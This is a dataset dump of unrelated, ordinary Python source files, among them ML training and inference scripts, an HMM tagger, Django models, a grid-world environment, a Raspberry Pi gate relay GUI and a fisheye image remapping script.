sen_len,\n SADHA.doc_len: doc_len\n }\n step, loss, accuracy, correct_num, mse = sess.run(\n [global_step, SADHA.loss, SADHA.accuracy, SADHA.correct_num, SADHA.mse],\n feed_dict)\n return correct_num, accuracy, mse\n\n def predict(dataset, name=None):\n acc = 0\n rmse = 0.\n print(\"speaker \",dataset.spkr[0])\n for i in range(dataset.epoch):\n if ((i+1)*100) < len(dataset.t_docs): \n# print(\"value of i \",i)\n correct_num, _, mse = predict_step(dataset.spkr[i], dataset.dom[i], dataset.docs[i],\n dataset.label[i], dataset.sen_len[i], dataset.doc_len[i], name)\n acc += correct_num\n rmse += mse\n acc = acc * 1.0 / dataset.data_size\n rmse = np.sqrt(rmse / dataset.data_size)\n return acc, rmse\n\n topacc = 0.\n toprmse = 0.\n better_dev_acc = 0.\n predict_round = 0\n\n # Training loop. For each batch...\n for tr_batch in trainbatches:\n train_step(tr_batch)\n current_step = tf.train.global_step(sess, global_step)\n if current_step % config1.evaluate_every == 0:\n predict_round += 1\n print(\"\\nEvaluation round %d:\" % (predict_round))\n\n dev_acc, dev_rmse = predict(devset, name=\"dev\")\n print(\"dev_acc: %.4f dev_RMSE: %.4f\" % (dev_acc, dev_rmse))\n test_acc, test_rmse = predict(testset, name=\"test\")\n print(\"test_acc: %.4f test_RMSE: %.4f\" % (test_acc, test_rmse))\n\n# print topacc with best dev acc\n if dev_acc >= better_dev_acc:\n better_dev_acc = dev_acc\n topacc = test_acc\n toprmse = test_rmse\n path = saver.save(sess, checkpoint_prefix, global_step=current_step)\n print(\"Saved model checkpoint to {}\\n\".format(path))\n print(\"topacc: %.4f RMSE: %.4f\" % (topacc, toprmse))\n","sub_path":"SADHAN/SADHA/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"288549207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 22:59:32 2018\n\n@author: Anchit Jain\n\"\"\"\nimport numpy as np\nimport pickle\n\nclass LogisticRegression:\n def __init__(self, lr, num_iter, threshold = 0.5):\n self.lr = lr\n self.num_iter = num_iter\n self.threshold = threshold\n\n\n def __add_intercept(self,X):\n intercept = np.ones((X.shape[0], 1))\n return np.concatenate((intercept, X), axis=1)\n\n def _sigmoid(self,z):\n return 1 / (1 + np.exp(-z))\n\n def __loss(self, h, y):\n return (-y * np.log(h) - (1 - y) * np.log(1 - h)).mean()\n\n def train(self,X,y):\n X = self.__add_intercept(X)\n\n # weights initialization\n self.theta = np.zeros(X.shape[1])\n print(self.theta)\n\n for i in range(self.num_iter):\n z = np.dot(X, self.theta)\n h = self._sigmoid(z)\n gradient = np.dot(X.T, (h - y)) / y.size\n self.theta -= self.lr * gradient\n\n z = np.dot(X, self.theta)\n h = self._sigmoid(z)\n loss = self.__loss(h, y)\n\n if( i % 100 == 0):\n print(f'loss: {loss} \\t')\n filehandler = open(\"logistic_regression_model.pickle\",'wb')\n pickle.dump(self.theta,filehandler)\n filehandler.close()\n\n return True\n\n def predict(self, X):\n file = open(\"logistic_regression_model.pickle\",'rb')\n self.theta = pickle.load(file)\n X = self.__add_intercept(X)\n prob = self._sigmoid(np.dot(X, self.theta))\n return prob >= self.threshold\n def evaluate(self, test_x, test_y):\n y_predicted = self.predict(test_x)\n correct = 0\n for i,y in enumerate(test_y):\n if y == 0:\n y = False\n else:\n y = True\n if y == y_predicted[i]:\n correct = correct + 1\n total = y_predicted.size\n\n return (correct/total)*100\n","sub_path":"machine_learning/spam_classifier/oneoone/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"602769967","text":"skills = ['Python', 'C++', 'Javascript', 'Juggling', 'Running', 'Eating']\ncv = {}\nprint(\"Welcome to the special recruitment program, please answer the following questions: \")\ncv['name'] = input(\"What's your name? \")\ncv['age'] = input(\"How old are you? \")\ncv['experience'] = input(\"How many years of experience do you have? \")\ncv['skills'] = []\nprint(\"\"\"Skills:\n1- Python\n2- C++\n3- Javascript\n4- Juggling\n5- Running\n6- Eating\"\"\")\ncv['skills'].append(input(\"Choose a skill from above by entering its number: \"))\ncv['skills'].append(input(\"Choose another skill from above by entering its number: \"))\nif int(cv['age']) > 25 and int(cv['age']) < 40 and int(cv['experience']) > 3 and '1' in cv[\"skills\"]:\n print(\"You have been accepted, {}!\".format(cv['name']))\nelse:\n print(\"We're sorry, {}.\".format(cv['name']))\n","sub_path":"recruitment_program.py","file_name":"recruitment_program.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"332124402","text":"#%% IMPORT\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport itertools\n\n#%% Functions\ndef plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n#%% LOADING DATA\nclasses = {'anterior_grooming' : 0, 'posterior_grooming' : 1, 'walking' :2, 'resting' : 3}\nclasses_prediction = { 'antennal_grooming' : 0, 'eye_grooming' : 0, 'foreleg_grooming' : 0, 'hindleg_grooming' : 1, 'abdominal_grooming' : 1, 'walking' : 2, 'resting' : 3}\nbeh_df = pd.read_pickle(\"COBAR_behaviour_incl_manual_corrected.pkl\")\nlabels_manual = beh_df[\"Manual\"].values\nlabels_prediction = beh_df[\"Prediction\"].values\nlabels_prediction = np.delete(labels_prediction,labels_manual == 'abdominal_pushing')\nlabels_manual = np.delete(labels_manual,labels_manual == 'abdominal_pushing')\n\nscore = np.mean(labels_prediction == labels_manual)\n\ny_predicted = [classes_prediction[p] for p in labels_prediction]\ny_true = [classes[p] for p in labels_manual]\n \ncm_angle = confusion_matrix(y_true, y_predicted)\nplot_confusion_matrix(cm_angle, classes, normalize=True, title='Confusion matrix', cmap=plt.cm.Blues)","sub_path":"matthieu/score_basic_predicted_labels.py","file_name":"score_basic_predicted_labels.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"232624365","text":"from ornateNoun import *\nfrom random import randint\nimport linecache\n\ndef relative_pronoun():\n pronoun = linecache.getline('pronoun.txt', randint(1, 76))\n pronoun = pronoun.replace('\\n', '')\n return pronoun\n\ndef verb():\n verb = linecache.getline('verb.txt', randint(1, 163))\n verb = verb.replace('\\n', '')\n return verb\n\ndef preposition():\n preposition = linecache.getline('preposition.txt', randint(1, 59))\n preposition = preposition.replace('\\n', '')\n return preposition\n\ndef f_start():\n \"\"\"Calling this function will generate a fancy noun.\"\"\"\n f_noun = o_start()\n chance = randint(1, 3)\n\n if chance == 1:\n f_noun += \" \" + relative_pronoun()\n chance = randint(1, 2)\n if chance == 1:\n f_noun += \" \" + verb() + \" \" + f_start()\n else:\n f_noun += \" \" + f_start() + \" \" + verb()\n elif chance == 2:\n return f_noun\n elif chance == 3:\n f_noun += \" \" + preposition() + \" \" + f_start()\n return f_noun\n\nif __name__ == '__main__':\n print (f_start())\n","sub_path":"fancyNoun.py","file_name":"fancyNoun.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"80413087","text":"import argparse\nimport glob\nimport math\nimport os\nfrom collections import deque\n\nimport cv2\nimport numpy as np\nfrom scipy import io as sio\n\nfrom tensorpack.predict import OfflinePredictor, PredictConfig\nfrom tensorpack.tfutils.sessinit import get_model_loader\n\nfrom config import Config\nfrom misc.utils import rm_n_mkdir\nfrom model.graph import Model_NP_DIST, Model_NP_XY\n\nclass Inferer(Config):\n\n def __gen_prediction(self, x, predictor):\n \"\"\"\n Using 'predictor' to generate the prediction of image 'x'\n\n Args:\n x : input image to be segmented. It will be split into patches\n to run the prediction upon before being assembled back \n \"\"\" \n step_size = self.infer_mask_shape\n msk_size = self.infer_mask_shape\n win_size = self.infer_input_shape\n\n def get_last_steps(length, msk_size, step_size):\n nr_step = math.ceil((length - msk_size) / step_size)\n last_step = (nr_step + 1) * step_size\n return int(last_step), int(nr_step + 1)\n \n im_h = x.shape[0] \n im_w = x.shape[1]\n\n last_h, nr_step_h = get_last_steps(im_h, msk_size[0], step_size[0])\n last_w, nr_step_w = get_last_steps(im_w, msk_size[1], step_size[1])\n\n diff_h = win_size[0] - step_size[0]\n padt = diff_h // 2\n padb = last_h + win_size[0] - im_h\n\n diff_w = win_size[1] - step_size[1]\n padl = diff_w // 2\n padr = last_w + win_size[1] - im_w\n\n x = np.lib.pad(x, ((padt, padb), (padl, padr), (0, 0)), 'reflect')\n\n #### TODO: optimize this\n sub_patches = []\n # generating subpatches from orginal\n for row in range(0, last_h, step_size[0]):\n for col in range (0, last_w, step_size[1]):\n win = x[row:row+win_size[0], \n col:col+win_size[1]]\n sub_patches.append(win)\n\n pred_map = deque()\n while len(sub_patches) > self.infer_batch_size:\n mini_batch = sub_patches[:self.infer_batch_size]\n sub_patches = sub_patches[self.infer_batch_size:]\n mini_output = predictor(mini_batch)[0]\n mini_output = np.split(mini_output, self.infer_batch_size, axis=0)\n pred_map.extend(mini_output)\n if len(sub_patches) != 0:\n mini_output = predictor(sub_patches)[0]\n mini_output = np.split(mini_output, len(sub_patches), axis=0)\n pred_map.extend(mini_output)\n\n #### Assemble back into full image\n output_patch_shape = np.squeeze(pred_map[0]).shape\n ch = 1 if len(output_patch_shape) == 2 else output_patch_shape[-1]\n\n #### Assemble back into full image\n pred_map = np.squeeze(np.array(pred_map))\n pred_map = np.reshape(pred_map, (nr_step_h, nr_step_w) + pred_map.shape[1:])\n pred_map = np.transpose(pred_map, [0, 2, 1, 3, 4])\n pred_map = np.reshape(pred_map, (pred_map.shape[0] * pred_map.shape[1], \n pred_map.shape[2] * pred_map.shape[3], ch))\n pred_map = pred_map[:im_h,:im_w] # just crop back to original size\n\n return pred_map\n\n ####\n def run(self):\n model_path = self.inf_model_path\n\n MODEL_MAKER = Model_NP_XY if self.model_mode == 'np+xy' else Model_NP_DIST\n\n pred_config = PredictConfig(\n model = MODEL_MAKER(),\n session_init = get_model_loader(model_path),\n input_names = self.eval_inf_input_tensor_names,\n output_names = self.eval_inf_output_tensor_names)\n predictor = OfflinePredictor(pred_config)\n\n for norm_target in self.inf_norm_codes:\n norm_dir = '%s/%s/' % (self.inf_norm_root_dir, norm_target)\n norm_save_dir = '%s/%s/' % (self.inf_output_dir, norm_target)\n\n # TODO: cache list to check later norm dir has same number of files\n file_list = glob.glob('%s/*%s' % (norm_dir, self.inf_imgs_ext))\n file_list.sort() # ensure same order\n\n rm_n_mkdir(norm_save_dir) \n for filename in file_list:\n filename = os.path.basename(filename)\n basename = filename.split('.')[0]\n print(basename, norm_target, end=' ', flush=True)\n\n ##\n img = cv2.imread(norm_dir + filename)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n ##\n pred_map = self.__gen_prediction(img, predictor)\n sio.savemat('%s/%s.mat' % (norm_save_dir, basename), {'result':[pred_map]})\n print('FINISH')\n\n####\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n args = parser.parse_args()\n \n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n n_gpus = len(args.gpu.split(','))\n\n inferer = Inferer()\n inferer.run() \n","sub_path":"src/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"195504591","text":"# Copyright 2018 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Loaner Sync User Lib.\"\"\"\n\nimport logging\n\nfrom loaner.web_app import constants\nfrom loaner.web_app.backend.auth import permissions\nfrom loaner.web_app.backend.clients import directory\nfrom loaner.web_app.backend.models import user_model\n\n_DIR_CALL_INVALID_MSG = (\n 'The call to the Directory client is invalid because: %s.')\n\n\nclass Error(Exception):\n \"\"\"Default error class for this module.\"\"\"\n\n\nclass InvalidCallToDirectoryError(Error):\n \"\"\"Raised when the call to Directory client is invalid.\"\"\"\n\n\ndef sync_user_roles():\n \"\"\"Syncs all of the elevated user roles for each user in Google groups.\"\"\"\n logging.info(\n 'Using admin account (%s) to sync users.', constants.ADMIN_USERNAME)\n directory_client = directory.DirectoryApiClient(\n user_email=constants.ADMIN_USERNAME)\n technical_admin_users_from_group = _get_users_directory(\n constants.TECHNICAL_ADMINS_GROUP, directory_client)\n operational_admin_users_from_group = _get_users_directory(\n constants.OPERATIONAL_ADMINS_GROUP, directory_client)\n technician_users_from_group = _get_users_directory(\n constants.TECHNICIANS_GROUP, directory_client)\n\n ndb_technical_admin_users = (\n user_model.User.query(user_model.User.roles.IN(\n [permissions.TECHNICAL_ADMIN_ROLE.name])).fetch(keys_only=True))\n ndb_operational_admin_users = (\n user_model.User.query(user_model.User.roles.IN(\n [permissions.OPERATIONAL_ADMIN_ROLE.name])).fetch(keys_only=True))\n ndb_technician_users = (\n user_model.User.query(user_model.User.roles.IN(\n [permissions.TECHNICIAN_ROLE.name])).fetch(keys_only=True))\n _add_or_remove_user_roles(\n users_keys=ndb_technical_admin_users,\n group_users=technical_admin_users_from_group,\n role=permissions.TECHNICAL_ADMIN_ROLE.name)\n _add_or_remove_user_roles(\n users_keys=ndb_operational_admin_users,\n group_users=operational_admin_users_from_group,\n role=permissions.OPERATIONAL_ADMIN_ROLE.name)\n _add_or_remove_user_roles(\n users_keys=ndb_technician_users,\n group_users=technician_users_from_group,\n role=permissions.TECHNICIAN_ROLE.name)\n\n\ndef _get_users_directory(group_email, client):\n \"\"\"Get all users from given Google Group.\n\n Args:\n group_email: str, the email used to retrieve a paged list of users.\n client: the directory client used to call the Directory API.\n\n Returns:\n user_group: a list of users for the group.\n \"\"\"\n try:\n response = client.users_in_group(group_email=group_email)\n except directory.DirectoryRPCError as err:\n raise InvalidCallToDirectoryError(\n _DIR_CALL_INVALID_MSG % str(err))\n user_group = []\n while 'nextPageToken' in response:\n for member in response['members']:\n user_group.append(member['email'])\n try:\n response = client.users_in_group(\n group_email=group_email, page_token=response.get('nextPageToken'))\n except directory.DirectoryRPCError as err:\n raise InvalidCallToDirectoryError(\n _DIR_CALL_INVALID_MSG % str(err))\n if 'nextPageToken' not in response:\n for member in response['members']:\n user_group.append(member['email'])\n return user_group\n\n\ndef _add_or_remove_user_roles(users_keys, group_users, role):\n \"\"\"Add or remove a user's role based on Google group membership.\n\n This will check the datastore users that are passed (ndb_users) against the\n users in the Google group that are passed (group_users). It will do nothing\n with the union of both. It will add the given role to the users that are in\n the Google group and not in the datastore users (creating a user object in\n datastore if nessesary). Similarly, it will remove the user permissions if\n the ndb_users are not in group_users.\n\n Args:\n users_keys: user_model.User obj, the user object keys from datastore.\n group_users: list, a list of users from a Google Group.\n role: str, the role to add or remove from user.\n \"\"\"\n ndb_user_ids = [user.id() for user in users_keys]\n users_to_add_role = set(group_users) - set(ndb_user_ids)\n users_to_remove_role = set(ndb_user_ids) - set(group_users)\n for user_email in users_to_add_role:\n user = user_model.User.get_user(email=user_email)\n user.roles.append(role)\n user.put()\n for user_email in users_to_remove_role:\n user = user_model.User.get_by_id(user_email)\n user.roles.remove(role)\n user.put()\n","sub_path":"loaner/web_app/backend/lib/sync_users.py","file_name":"sync_users.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"171683307","text":"from django.db import models\n\nclass Contact(models.Model):\n email_id = models.CharField(max_length=30, primary_key=True)\n password = models.CharField(max_length=128)\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n phone = models.CharField(max_length=20, blank=True, null=True)\n date_joined = models.DateTimeField()\n contacts = models.ManyToManyField(\"self\", blank=True)\n \n def __unicode__(self):\n return self.email_id\n \n class Meta:\n ordering = ['email_id']\n \nclass Mail(models.Model):\n subject = models.TextField()\n body = models.TextField()\n date_sent = models.DateTimeField()\n sent_by = models.ForeignKey(Contact, related_name=\"sent_by\")\n sent_tos = models.ManyToManyField(Contact, related_name=\"sent_tos\", through=\"SentMail\")\n \n def __unicode__(self):\n return u'%s - %s' % (self.date_sent, self.subject)\n \n class Meta:\n ordering = ['sent_by', 'date_sent']\n \nclass SentMail(models.Model):\n sent_to = models.ForeignKey(Contact)\n mail = models.ForeignKey(Mail)\n read = models.BooleanField()\n date_read = models.DateTimeField(blank=True, null=True)\n \n def __unicode__(self):\n return u'%s - %s' %(self.sent_to, self.read)\n \n class Meta:\n ordering = ['sent_to', 'read', 'date_read']\n ","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"597977532","text":"from random import randint\n\nclass Environment:\n\n def __init__(self):\n # define the boundary of the Environment\n self.x_limit = 5\n self.y_limit = 5\n # define the action space\n self.action_space = [\"up\", \"left\", \"down\", \"right\"]\n # define a mapping from state to reward\n # use it to generate a mapping from (state, action) to reward\n # in this case we use the convention that\n self.goal_reward = 100\n self.goal_states = [(5,5)]\n self.reward_map = \\\n Environment.add_actions_to_reward_map({ (5,5): self.goal_reward },\n self.action_space)\n\n @staticmethod\n def add_actions_to_reward_map(reward_map, action_space):\n reward_map_with_actions = {}\n for state in reward_map:\n for action in action_space:\n (x, y) = state\n if action == \"up\":\n state_action_pair = ((x,y+1), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n elif action == \"left\":\n state_action_pair = ((x+1,y), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n elif action == \"down\":\n state_action_pair = ((x,y-1), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n elif action == \"right\":\n state_action_pair = ((x-1,y), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n return reward_map_with_actions\n\n def initialize_q_table(self):\n q_table = {}\n for x in range(1, self.x_limit+1):\n for y in range(1, self.y_limit+1):\n for action in self.action_space:\n state = (x, y)\n q_table[(state, action)] = 0\n return q_table\n\n def reset(self):\n while True:\n x = randint(1, self.x_limit)\n y = randint(1, self.y_limit)\n if (x, y) not in self.goal_states:\n break\n return (x, y)\n\n def step(self, state, action):\n next_state = self.state_transition(state, action)\n reward = self.reward(state, action)\n if reward == self.goal_reward:\n done = True\n else:\n done = False\n return (next_state, reward, done)\n\n\n def state_transition(self, state, action):\n (x, y) = state\n if action == \"up\":\n next_state = (x, y-1)\n elif action == \"down\":\n next_state = (x, y+1)\n elif action == \"left\":\n next_state = (x-1, y)\n elif action == \"right\":\n next_state = (x+1, y)\n # check and correct for the possibility of state going out of bounds\n if next_state[0] > self.x_limit:\n return (self.x_limit, next_state[1])\n elif next_state[1] > self.y_limit:\n return (next_state[0], self.y_limit)\n elif next_state[0] < 1:\n return (1, next_state[1])\n elif next_state[1] < 1:\n return (next_state[0], 1)\n # else in bounds\n else:\n return next_state\n\n def reward(self, state, action):\n if (state, action) in self.reward_map:\n return self.reward_map[(state, action)]\n else:\n return 0\n","sub_path":"Grid_World_With_Stationary_Goal.py","file_name":"Grid_World_With_Stationary_Goal.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"469194162","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"charlie\"\n\nfrom collections import Counter\nimport re\nimport codecs\nimport sets\n\nfrom classifier import SequenceClassifier\nfrom util import Ngram\n\nclass HMM(SequenceClassifier):\n \"\"\"\n This is a class implementing the Hidden Markov Model.\n \"\"\"\n\n def __init__(self):\n\n SequenceClassifier.__init__(self)\n\n self.emission = dict()\n self.transmit_p = dict()\n self.pi = dict()\n self.states = list()\n\n def clear(self):\n \"\"\"\n override\n \"\"\"\n self.emission = dict()\n self.transmit_p = dict()\n self.pi = dict()\n self.states = list()\n\n def generate_pi(self):\n \"\"\"\n to generate the inital state transition probability.\n \"\"\"\n\n it = iter(self.states)\n\n self.pi[it.next()] = 1.0\n\n for s in it:\n self.pi[s] = .0\n\n return self.pi \n\n\n\n def estimate_emission(self):\n \"\"\"\n to estimate the emission probability.\n \"\"\"\n\n tagCnt = Counter()\n # accumulate the count\n for v in self.data:\n\n for elem in v:\n\n word, tag = elem\n # tag = tag[:-1] if tag.endswith(u'\\n') else tag\n\n if tag not in self.emission:\n self.emission[tag] = dict()\n\n if word not in self.emission[tag]:\n self.emission[tag][word] = 0\n\n self.emission[tag][word] += 1\n\n tagCnt[tag] += 1\n\n\n for tag in self.emission:\n for word in self.emission[tag]:\n self.emission[tag][word] = float(self.emission[tag][word]) / tagCnt[tag]\n\n \n def estimate_transition(self):\n \"\"\"\n to estimate the transition probability.\n \"\"\"\n\n doc = []\n states = []\n \n for v in self.data:\n for elem in v:\n \n word, tag = elem\n # tag = tag[:-1] if tag.endswith(u'\\n') else tag\n\n states.append(tag)\n\n doc.append(states)\n states = []\n\n corpus = [doc]\n\n bigram = Ngram.count_ngram(corpus, 2)\n\n self.transmit_p = dict()\n for g in bigram:\n start, end = g\n\n if start not in self.transmit_p:\n self.transmit_p[start] = dict()\n\n if end not in self.transmit_p[start]:\n self.transmit_p[start][end] = bigram[g]\n\n return self.transmit_p\n\n def train(self):\n \n self.estimate_transition()\n \n self.estimate_emission()\n\n self.states = self.getClasses()\n\n self.generate_pi()\n\n\n def viterbi(self, obsv):\n\n v = [dict()]\n\n path = dict()\n\n for s in self.states:\n x = obsv[0]\n # if x not in emis[s]:\n # x = '{OTHER}'\n v[0][s] = self.emission[s][x] * self.pi[s]\n \n\n\n path[s] = [s]\n\n \n\n for i in xrange(1,len(obsv)):\n\n v.append(dict())\n\n newpath = dict()\n\n x = obsv[i]\n\n prev_x = obsv[i-1]\n\n for s in self.states:\n\n # r = []\n # for s0 in states:\n # tmp = (v[i-1][s0] * trans[s0][s] * emis[s][x], s0) \n # r.append(tmp)\n\n # prob, state = max(r)\n (prob, state) = max([(v[i-1][s0] * self.transmit_p[s0][s] * self.emission[s][x], s0) for s0 in self.states])\n\n v[i][s] = prob\n\n newpath[s] = path[state] + [s]\n\n path = newpath\n\n (prob, state) = max([(v[len(obsv) - 1][y], y) for y in self.states])\n return (prob, path[state])\n\n\n def classify(self, obsv):\n return self.viterbi(obsv)\n\ndef filterLowFreqWord(data, n=5):\n\n wordCnt = Counter()\n\n for line in data:\n\n if line == u'\\n':\n continue\n\n word = line.split(' ')[0]\n\n wordCnt[word] += 1\n\n\n lowFreqSet = sets.Set()\n\n for word in wordCnt:\n if wordCnt[word] <= n:\n lowFreqSet.add(word)\n\n newData = []\n\n for line in data:\n\n if line == u'\\n':\n newData.append(line)\n continue\n\n word = line.split(' ')[0]\n tag = line.split(' ')[1]\n\n if word in lowFreqSet:\n\n newData.append(replaceWord(word) + ' ' + tag)\n else:\n newData.append(line)\n\n return newData\n \n\n# #######################\n# Problem:\n# 1. new word\n# 2. float overflow\n# #######################\n\n\n","sub_path":"hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"19932995","text":"decimalDens = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]\nromanDens = [\n \"M\",\n \"CM\",\n \"D\",\n \"CD\",\n \"C\",\n \"XC\",\n \"L\",\n \"XL\",\n \"X\",\n \"IX\",\n \"V\",\n \"IV\",\n \"I\"]\n\n\ndef toRoman(dec):\n if dec <= 0:\n raise ValueError(\"It must be a positive\")\n elif dec >= 5000:\n raise ValueError(\"It must be lower than 5000\")\n\n return decToRoman(dec, \"\", decimalDens, romanDens)\n\n\ndef decToRoman(num, s, decs, romans):\n if decs:\n if num < decs[0]:\n return decToRoman(num, s, decs[1:], romans[1:])\n else:\n return decToRoman(num - decs[0], s + romans[0], decs, romans)\n else:\n return s\n","sub_path":"Project Euler/romanUtils.py","file_name":"romanUtils.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"419149119","text":"import time\n\nimport tkinter as tk\nimport RPi.GPIO as gpio\n\nRELAY_PIN = 21 # BCM PIN\nSWITCH_ON_DELAY = 1 # in seconds\n\n\ndef trigger_gate():\n print(\"Switching relay ON for two seconds...\")\n gpio.setup(RELAY_PIN, gpio.LOW) # set to LOW to turn the relay ON\n print(\"Relay swithed on. Waiting 2 seconds...\")\n\n time.sleep(SWITCH_ON_DELAY)\n\n print(\"Switching relay OFF...\")\n gpio.setup(RELAY_PIN, gpio.HIGH) # set to HIGH to turn the relay OFF\n print(\"Relay switched off...\")\n\n\ndef label_info(window):\n info_label = tk.Label(window, text=\"wysyłanie sygnału.\")\n info_label.pick(side=tk.BOTTOM)\n\n\ndef creating_layout(window):\n open_button = tk.Button(window,text=\"OPEN THE GATE\", command=trigger_gate)\n open_button.pack()\n\n\n\n\nif __name__ == '__main__':\n gpio.setmode(gpio.BCM)\n window = tk.Tk()\n creating_layout(window)\n window.title(\"Office gate\")\n\n\n window.mainloop()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"626924664","text":"class Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n 给定一个没有重复数字的序列,返回其所有可能的全排列。\n \"\"\"\n\n def func(length, target, path):\n if length == target:\n array.append(path[:])\n else:\n for i in range(0, length+1):\n path = path[0:i] + [nums[length]] + path[i:length]\n func(length + 1, target, path)\n path.remove(nums[length])\n\n array = []\n tem = []\n size = len(nums)\n func(0, size, tem)\n return array\n\n\ntest = Solution()\nprint(test.permute([1, 2, 3]))\n","sub_path":"_046_permute.py","file_name":"_046_permute.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249821547","text":"# main.py\n\n# Librerias importadas\nimport fun\nimport cv2\n\n# Para medir tiempo\n#import time\n#start = time.clock()\n# En esta posicion iria el codigo a evaluar\n#print start-time.clock()\n\n# Se carga la imagen tomada con la camara VIVOTEK FE8172\nsrc = cv2.imread('./resources/IM1.jpg')\n\n# Parametros del Modelo Unificado de Imagenes\nl,m = 1,952\nu0,v0 = 960,960\n# Dimension de la proyeccion esferica deseada (nxn)\nn = 1000\n# Se mapean los puntos desde la esfera unitaria hacia el plano imagen VCA\nU,V = fun.map_sph(n,l,m,u0,v0)\n# Se proyectan los puntos desde el plano imagen VCA hacia la esfera unitaria\nsph = cv2.remap(src,U,V,cv2.INTER_NEAREST)\n\n# Punto de interes:\nu,v = 350,1100\n# Se calcula la matriz de rotacion para apuntar la esfera a un punto (u,v) dado\nMR = fun.findMR(u,v,l,m,u0,v0)\n# Se mapean los puntos desde la esfera rotada hacia la esfera original\nTheta,Phi = fun.map_sphrot(1000,MR)\n# Se proyectan los puntos desde la esfera original hacia la rotada\nsphrot = cv2.remap(sph,Theta,Phi,cv2.INTER_NEAREST)\n\n# Campo de vision deseado en [deg]\nfov = 30\n# Dimension de la imagen en perspectiva deseada\nw = 500\n# Se mapean los puntos desde el plano imagen PTZ virtual hacia la esfera rotada\nThetaR,PhiR = fun.map_ptzv(w,n,fov)\n# Se proyectan los puntos desde la esfera rotada hacia el plano imagen PTZ virtual\nptzv = cv2.remap(sphrot,ThetaR,PhiR,cv2.INTER_LINEAR)\n\n# Se muestra la imagen PTZ virtual obtenida\n#cv2.imshow('Imagen original',cv2.resize(src,(500,500)))\n#cv2.imshow('Imagen esferica',cv2.resize(sph,(500,500)))\ncv2.imshow('Imagen esferica rotada',cv2.resize(sphrot,(500,500)))\ncv2.imshow('Imagen PTZ virtual obtenida',ptzv)\n# Se reubican las ventanas\ncv2.moveWindow('Imagen esferica rotada',548,0)\ncv2.moveWindow('Imagen PTZ virtual obtenida',0,0)\n# Limpieza de las ventanas\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"code/py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
